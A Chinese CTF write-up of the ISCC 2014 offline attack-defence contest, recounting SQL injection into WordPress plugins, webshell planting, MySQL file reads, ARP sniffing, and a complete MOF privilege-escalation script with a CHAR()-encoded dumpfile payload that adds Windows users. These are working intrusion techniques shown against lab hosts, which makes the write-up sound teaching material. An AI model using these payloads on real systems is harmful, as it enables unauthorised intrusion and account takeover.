0×00
这次比赛去了北京 认识了很多大黑阔哇 好开心的说 大家一起搅基 一起互相猥琐做题也很开心 之后都不会忘记这次的满满基情 这次的分队是随机的 3个人一队 有7个国家 模拟的战国七国争霸 这次有Kuuki大黑阔和Invoker 带我飞
比赛的环境是有内外网两个部分 选手有自己的3台服务器的领地 172.16网段的 可以自己的去拿下的 得分只能得一次 就是需要互相争抢 在最后的时刻守住服务器才能算是得分 漏洞可以修复 分数都是500
还有高地的服务器是可以重复得分的 一队得分后不会影响后面的队伍得分 分数也是500 那里有其他的一些服务器 这里的漏洞是不允许修复的 最多就是把自己的入侵痕迹清理了
0×01 wp的胜利
一开始,任务书给了一个ip,我们分配的ip是172.16.79.4 这个网段,不同的选手相互划了vlan。用nmap扫描了一下网段之后,是先去研究了自己阵地的服务器。wordpress,一开始就给wordpress的ip。wordpress的安全性很好,特别是高版本之后的wordpress。但是wordpress的插件就不那么安全了。在选手说明中,还说明的不要停止网站的插件,更加证明了是从wordpress插件渗透进去的。利用工具wpscan扫描之后,发现172.16.79.4存在了一个插件
fs-real-estate-plugin这个插件是有一个sql注入的漏洞的,还从发表的日志里 发现了一个用户ISCC_ADMIN。
我们到exploit-db上找了exp研究了一下,发现了存在sql注入的参数。
FireStorm Professional Real Estate WordPress Plugin 2.06.01 SQL Injection Vulnerability
然后在sqlmap上,利用sqlmap进行了渗透 插件的目录有列目录的漏洞 然后发现了没有xml 但是有php文件
http://172.16.79.4/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.php?id=1
这个就是注入点
sqlmap -u “http://172.16.79.4//wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.php?id=1″ -T wordpress
进行注入 一步步注入进去 查找到了网站后台的hash,wordpress的hash比较难破,和linux的hash的加密方法相同。在cmd5上破解之后,利用这个用户登陆上去。wordpress的后台只要能拿到账号,是很好拿shell的。直接在footer.php中加上一句话木马,然后菜刀连接上去主页就可以了。
之后在找mysql的密码,在配置文件 wp—config.php里面发现了mysql的root密码。
服务器是win的,按说从mysql的root下手提权的方法就是用udf或者是mof。提权这一步尝试了很久,倒是flag很快就拿到了。
flag是在桌面上,有一个flag.exe文件 这个是给出的线索。
使用了root权限的mysql 直接就可以读取到flag.exe的内容。
select hex(load_file("C:/Documents and File/Administrator/Desktop/flag.exe"));
读取到flag.exe 记事本打开发现了是一串看不懂的字符串,还有一些键盘的标志<ESC> <ENTER> 等等 我还观察到^是正则表达式的开头的部分
<Esc>italen<Enter>recrui<Esc>Vk:normal<space>At<Enter>:1<Enter>dpkJf<space>r_<Esc>A}<Esc>^iFLAG:{<Esc>
然后直到Kuuki 发现了:1 可能是vim中的参数 才把这些字符串在vim中输入 然后得出了正确的flag 其实我一开始把这些字符串拿去记事本里输入了 可是都没有什么 思路是对了 工具用错 解出来后顺利拿下一血
FLAG{recruit_talent}
后面的提权困扰了我们很久 udf提权 mysql的版本是5.5 有点高 dll必须要放在\lib\plugin 目录下才行 可是那个目录没有权限 进行udf传不上去
之前的比赛的时候看到一个姿势,把plugin目录改名 然后自己新建一个plugin目录就可以在里面xxoo了 可以是这次也不行 权限设置得相当死 后来网管提示说不是udf提权 而是mof提权
我们就去专心研究mof提权 这个时候已经有另一个队提权成功了 我们还没提权上去
然后就用mof提权 mof之前做工程实践的时候还用过 还有点印象 有现成的mof脚本
就是当时在纠结是写到C:/windows/system32/wbem/mof/good/目录 还是C:/windows/system32/wbem/mof/ 这个目录
还有一个困扰我们的问题就是windows的密码有规则限制。我们直接用mof执行的net user添加用户,一直没有成功。后来还给出了提示:
公告四:有些主机是有密码复杂度要求的
我们但是就拼命把密码设置得非常非常的复杂 而且特别的长
Kuuki牛 本地白盒尝试了才发现原来是密码不能超过14位。然后利用mof提权加上了用户
还发现 mof脚本是需要学到这个目录的C:/windows/system32/wbem/mof/ 执行成功之后就会放到C:/windows/system32/wbem/mof/good/目录下 失败就到C:/windows/system32/wbem/mof/bad/下面
要是有时候在C:/windows/system32/wbem/mof/good/里发现了东西 就是别人mof提权过的 看看脚本 说不定能用别人添加的账号登陆呢
mof的脚本
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net user appleu0 appleu0 /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
修改那条命令就可以用了 先加用户 再加权限
使用mysql的写法是
select CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,10,123,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,10,125,59,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,10,123,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,32,117,115,101,114,32,104,97,104,97,32,119,112,99,97,112,95,116,104,49,115,32,47,97,100,100,92,34,41,34,59,10,125,59,10,32,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,10,123,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,10,125,59) into dumpfile "C:/windows/system32/wbem/mof/appleu0.mof"
就可以成功加上用户haha 密码:wpcap_th1s
然后再改写一下提权至administrators组即可
3389连上就可以了 如果就在桌面上观察到了flag.exe还有一个sendflag.exe
0×02 wp漏洞修复
我们但是的漏洞修复 就是按照入侵的步骤来修复的 这样子才能修复的全面完整
先把wp的注入给修复了 intval()就可以搞定了
然后就去改wp后台的口令 有点弱 改得强一些 cmd5破不出了的那种
再是淫荡的把mof目录给删了 要加上目录就很难了 还有把mysql的密码给改了
Mimikatz读取了管理员的密码之后 把密码也改了
稳定下了这一台后 我们就向别的服务器进军
0×03 进击
我们拿下了自己wp之后 就想着要拿下别人的wp 要拿下先要有目标
自己也在服务器上面开了vpn 自己连上vpn之后 也能很方便的用wpscan nmap什么的
我们用nmap扫描网关 这样子找的比较快 172.16.*.254
找到目标之后 就上去找wp漏洞 发现是不同的插件 但是还是有注入漏洞 有的队伍修复得很快 一会的没有漏洞了 或者是密码被改得很复杂了 没法解开hash
千辛万苦才找到了一台服务器没有人管的 楚国的服务器 黑猫他们3个人都是偏逆向的方向 没有人日wp
楚国的渗透,发现了他们wp还没有修复,然后还是查找了插件,发现插件改变了。yolink-search 使用了这个插件,然后渗透进去,发现还没有人做,利用和之前一样的方法拿到mysql账号,mof提权,添加账号,然后登陆上去。
成功拿到flag,手快的把那些漏洞给修复了。然后去又去别的主机游荡,发现虽然有的还没提权拿到flag但是漏洞都被修复了。没法拿下,除了几台iscc弱口令的拿下的方式不太一样,还没有人提交。然后我们就去拿iscc弱口令的了。
韩国的JC老师
韩国的这个就是低权限账号iscc弱口令,利用iscc2014这个弱口令进去了之后,然后在iscc的后台有一个插件的注入,获取高权限的账号ISCC_admin,然后再拿shell提权。所以需要能弄到弱口令才行,后面的方法也是一样的。修复也是类似的,修复了注入。
其他的队虽然没有很快的拿到flag,当时都把入口堵住了 没法注入 或者是借不开hash 拿不到shell 到了下午基本大家也都做出来了 第一天的比赛一共收获了3台wordpress 获得1500分
第一天黑猫他们很猛 拿下了7国的B主机 是溢出的题目 看得我一愣一愣的 我们都没有去做那个题
C类主机在第一天也没有人搞出来 Ricter Z他第一天晚上说是快要搞出来了
高地的ip需要做一个socket的编程才能获取 我们3个web编得死去活来 才搞出来
socket编程 要求我们实现1000次加法的运算 用python来实现
import socket
import time
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.100.201', 9999))
time.sleep(2)
while True:
rev = sock.recv(1024)
print rev
left = rev[rev.find(':')+2:rev.find('+')-1]
right = rev[rev.find('+')+2:rev.find('=')-1]
sum = int(left)+int(right)
print sum
print sock.send(str(sum)+"\r\n")
time.sleep(2)
sock.close()
0×04 小米盒子
小米盒子这个服务器是给了一个前端的服务器,需要先拿下服务器。nmap扫了一下,发现开放的端口并不多,只有135 139 445这几个windows自带的。所以就判断是类似于ms-08067类似的溢出漏洞来获取权限。
利用了ms的漏洞获取了权限之后,发现了一个apk,本地安卓安装了一下发现没法运行。然后就去研究那个apk文件。
利用dex2jar 还有jdgui这两个工具可以看到一些apk的源码。然后使用adb进行调试 直接运行发现会报错
package com.iscc2014.Box;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.media.SoundPool;
import android.os.Bundle;
import android.util.Log;
import android.view.Menu;
import android.view.MenuInflater;
import android.widget.Button;
public class MainActivity extends Activity
{
Button button;
long palysoundagain = 10001L;
long selfclosetime = 30000L;
long startplaysound = 5000L;
String tabString = "iscc2014";
public void myPlaysound()
{
SoundPool localSoundPool = new SoundPool(10, 1, 5);
Context localContext = getApplicationContext();
localSoundPool.load(localContext, 2130968576, 1);
MainActivity.3 local3 = new MainActivity.3(this, localSoundPool);
localSoundPool.setOnLoadCompleteListener(local3);
}
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903040);
Button localButton1 = (Button)findViewById(2131296256);
this.button = localButton1;
Button localButton2 = this.button;
MainActivity.1 local1 = new MainActivity.1(this);
localButton2.setOnClickListener(local1);
try
{
Bundle localBundle1 = new Bundle();
Bundle localBundle2 = getIntent().getExtras();
String str1 = this.tabString;
localBundle2.getString(str1).length();
new MainActivity.2(this).start();
return;
}
catch (Exception localException)
{
StringBuilder localStringBuilder = new StringBuilder("WOW! You are very close to the flag! \n Note the startup parameters label---");
String str2 = this.tabString;
String str3 = str2;
Log.d("iscc", str3);
finish();
}
}
public boolean onCreateOptionsMenu(Menu paramMenu)
{
getMenuInflater().inflate(2131230720, paramMenu);
return true;
}
}
发现运行不起来,是参数有问题。缺少了参数,需要使用上一个iscc2014的参数才行,然后就在前端xp服务器上使用了adb,然后使用adb shell am start -n 包名/包名+类名(-n 类名,-a action,-d date,-m MIME-TYPE,-c category,-e 扩展数据,等) 使用这个
adb shell am start -n com.iscc2014.Box/com.iscc2014.Box.MainActivity -e iscc2014 appleu0
这样子就能听到 咦,主人好像发现野生flag一枚呢
和网管说一下就能得到500分了
0×05 树莓派
首先检测到了树莓派的IP,通过nmap扫描发现开启了SSH服务。直接SSH服务登陆,试了几个弱密码发现不对。之后就从网上搜索了树莓派的默认账号名和密码,接着成功使用pi、rasyberry默认的账号密码登陆。登陆之后发现了一个pdf,接着打开pdf发现是树莓派摄像头的使用手册,便想到可能是开启摄像头拍摄flag的思路。接着从history 中发现了开启树莓派的摄像头的命令,接着成功得到flag。
这个题是跟着别人进去的 进去之后 我们也把histroy删除了
Remain_strong
0×06 其他没做出来的
还有一些题 研究出了个大概 到了比赛结束一点破才恍然大悟 痛心疾首
第一个题是ricter Z做出来了 秒杀了全场的st2
漏洞模拟了wooyun上的一个实例 我们当时都在研究那个 也给出了提示
ricter过来看了一眼和我说 不是这个漏洞 然后我就去看别的了 真是痛心疾首 悔不当初
真的是这个漏洞
通过搜狗某搜索功能扫描搜狗内网(续)之攻击内网struts2漏洞主机
哭死了
比赛的时候 模拟了这个环境 利用搜索图片的功能进入内网 然后再在内网里利用st2的漏洞里获取权限
很可惜 没有拿下来 主要是脚本的回显有问题 一直没搞出来
还有一道是高地的web题目 cookie欺骗的
题目给出了down.rar 是网站的源码 是aspx的题目 需要我们进行白盒审计 拿到权限 获取flag
我们就在网上找系统类型的源码 filemanage 文件上传下载管理系统 是这个cms
然后使用beyond compare进行对比 利用了类似与漏洞补丁对比的技术进行查找
发现了 有一处可疑的地方 在Default.aspx.cs 中
后面是RickGray做的 我们没搞出来
这里缺少了认证 然后利用cookie欺骗 进入\admin\add_new_user.aspx中 添加一个用户
有个rar压缩包,里面是创力的数据库 里面有管理员用户的hash
破了就可以就创力后台了 在后台通过增加文章栏目 造成.asp文件夹iis解析
然后sa 的xp cmd不能执行 原本的cmd也被禁了,自己传一个 用另一个存储过程 可以执行
一开始只把flag down到本地了,但是就是连不上
flag也是挺纠结 只不过以前RickGray牛恰好看到过,一道defcon题目 然后就解出来了
OpenWrt wifi破解的
我们没有去抓包破 是到后来别的组也没搞出来 拿来给我们看了一下
比赛的时候还有一个wifi 需要我们去破解 然后渗透
OpenWrt的wifi密码是 ihack
比赛的时候 一说有OpenWrt的wifi 大家的wifi的ssid都变成了OpenWrt 一下多了好几个wifi
还有大神现场用wifi做钓鱼的 还真的钓到了
然后登陆上去肯定是去看后台
192.168.1.1
发现需要登陆 尝试了一会弱口令没尝试出来就去看看网页的源代码没看出个啥就放弃了
其实正确的思路是在后台源码的js文件里面 好像说里面藏了 后台登陆的账号密码
网管说有一个flag比较有趣 就放出来 purpleroc他们队不到十分钟就秒了 吓死我们了 后来了解到是google到一模一样的 然后就秒破了
题目给的是Flag.txt 内容是
H4sICG/SllMAA2lzY2MyMDE0AO3TT2jbVhwH8OckVts128wORYxSnlkOK8ygsVJ8CItJ96+jC9vK BvWhiI2ZBXTYKRRjRA3zKGMuvQxCT0LgER162C2UMJ5MESOE4stMIJCjewvppWNtkPd7T9KLnJHC xrbT9xNbX7/fe9J7T1KW3r36aqHAtMtzl9iVGbF9wx/fDW52GedPhf+aJ/hDETC/1j3BNwdPu0VO H+oJuM+6M7Ikhy14JRrm970X+cthMNWd5oHs5cshXw/5L6EcU/RO89+ELzxGY7zT/ika/krys+SH 3h795DzsvbN/EJQ6nwTnOh8Hhc6nwZedqyNrMDV60y/cPlPbpK9/8t6Z2vnCjwubgye9zweFGvVM 855lfkjOT58q0cy12wb/weD2KpXMZd4pr74gdfj35ld87acyrdb2GQ2ij31vipee0cF6ZtNCaUu3 Br/b35W/5R77me8btPNfB09sr+gzXgxpr0zuNfRiueLH4ki9700fUz+Z1I9e6LgTjpsg9P5ILxSc 6xa4Hbwkjz4tVi25SFvolbsG73E60GMSyZPrcXNZdPidqVH51mDH/mxp6Vrl/QsfvVVmC0QeKnSo lBh9Lbbwxtzr7FLl8lzlQuU9ehWejwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMC/4a44 IWbEuK2Mmauww3ZjZWXli1x7sbl4fXGy3cy36/XFZjPff32yn9r1iXa9OTm+rvpvJuIEtdc31j2P 2lE/2t2l9urGxqrsH/X7I+p/sHZn7QG17w/3hvfjv30XHrXbjLXbj46rH82/nueO26qSZXvs5tK0 FFPnrKLzHz26/5ApMVOn4ziqfpgx/Tk6zbfteaNl6mw0Zk2r0dBpffC1Vb9yUae8ajpPkslt0Wmp iS2dzNxxd+RQnaZr5jO5mJVLN61mKes6DYPWZds6W9FwOIxaOs2qnNfV2YqMs9+IeCINNT7Js/PO 1lY8qzMWB4asZ9mKxEGUy1jOa1k6W1RM+nW6Ri7/bzRvHEWRTlq0/OikfQiR7EclFaO0X2UsxIGg +zSZQiedt5veD5VROk+W8+q5z+s0JBqXZbS1vb+9FekUSqwz2qPHKK+XZTQaPsxlS62zpVNuSq4r y7RuZCnrcp4sad2t9LmqdM3kPyXLKL3uYTpOtVrKpXzRnFw6VUetL8lGoyG3rpPek6ot72OaAAAA AAAAAAAAAAAAAM/zJ815iZQQYAAA
然后一开始以为是base64 没搞对 其实可以google到的
原来是姿势错了 base64是对的 base64出来发现是二进制的东西 就判断会不会是一个文件
解密Cagetest招聘页面
一模一样的题目 就是数据改了
在linux下
base64 -d 1.txt>base64 file base64
然后发现是一个压缩文件 用7z可以秒杀很多的压缩文件
file iscc2014
发现还是任天堂的nes 用个Virtualnes打开黑屏了
网管是用这个nestopia打开的
就获取到了flag
I$CC-I$-4-FUNNY-G4ME!
0×07 社工出奇迹
比赛的时候还有很多很好玩的事情 我很机智的把我的gear手表带去 去进行拍照什么的 去之前还把声音去消除了
具体的教程在这里 gear免刷机相机消声
然后就用手表拍拍照什么的 其实也没拍到啥 都没想用手表去搞
后来想到了一个猥琐的 把手表的录像功能打开 然后放在选手的桌子上 进行偷拍 不过也没有进行 gear大法好
还有ricter 一开始拿到C类主机的漏洞的时候 还苦于没有找到别的C类服务器的ip 没法攻击别人
他进行了实地社(zuo)工(die) 跑去看别人的任务书 后来据他说 尴尬了 抢的时候抢错了 抢到了比赛简介 没拿到任务书
然后他就被吊打了 后来我们之间还在打算进行交易之类的 我给他们ip 他们分一些主机给我们 之后还是没有谈拢 他们用了nmap之后也就拿下了七国
当时他们在做出ST2这个的时候 我们队急了 知道这个题要是全搞下来那肯定就是第一的 我们之前拿下里过他们的一台A类主机 就在A类主机上嗅探 用ettercap没嗅探到 换了用cain嗅探 cain只能制定特定字段的 没有全部的http信息 就用wireshark配合抓包分析 可是什么也没有
回来之后和laterain交流 他说了一个方法 使用zxarps
zxarps.exe -idx 2 -ip 172.16.96.100 -port 80 -save_a data.txt
这里这个可以嗅探到双向的80端口的信息 而且可以命令行操作 很便于只有cmd shell的情况
这次的比赛 还没有限制 可以交换flag之类的 因为 自己阵地的服务器 是需要拿到服务器的权限 然后再用上面的sendflag发送flag来获取分数的 光是拿到flag是没有用的
这个分数只算最后是谁获取的 如果被别人拔旗了那么之前的分数不算 楚国的黑猫他们 第一天的赢面很大 拿下的七国的溢出 可是第二天因为没有好好防守被gank了 这个方式很好 还能进行交易之类的 每队都是为了自己的胜利 去想办法合纵连横 很有趣 大家也不是沉闷地各做各的 而是互相在渗透着对方 有时候过去打听一下消息 获取一下别人的进度啊 消息之类的 真是不打不相识 非常有趣
0×08 后记
比赛到了最后 是第四名 比较可惜 不过 大家玩的还是非常的high的 最后ricter joychou他们获得了第一很屌 很强大 也在线下认识了很多大黑阔啊 很开心 要多找大黑阔搅基 还有膜拜网管 感觉太屌了
FROM :appleu0.sinaapp.com | Author:appleu0
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论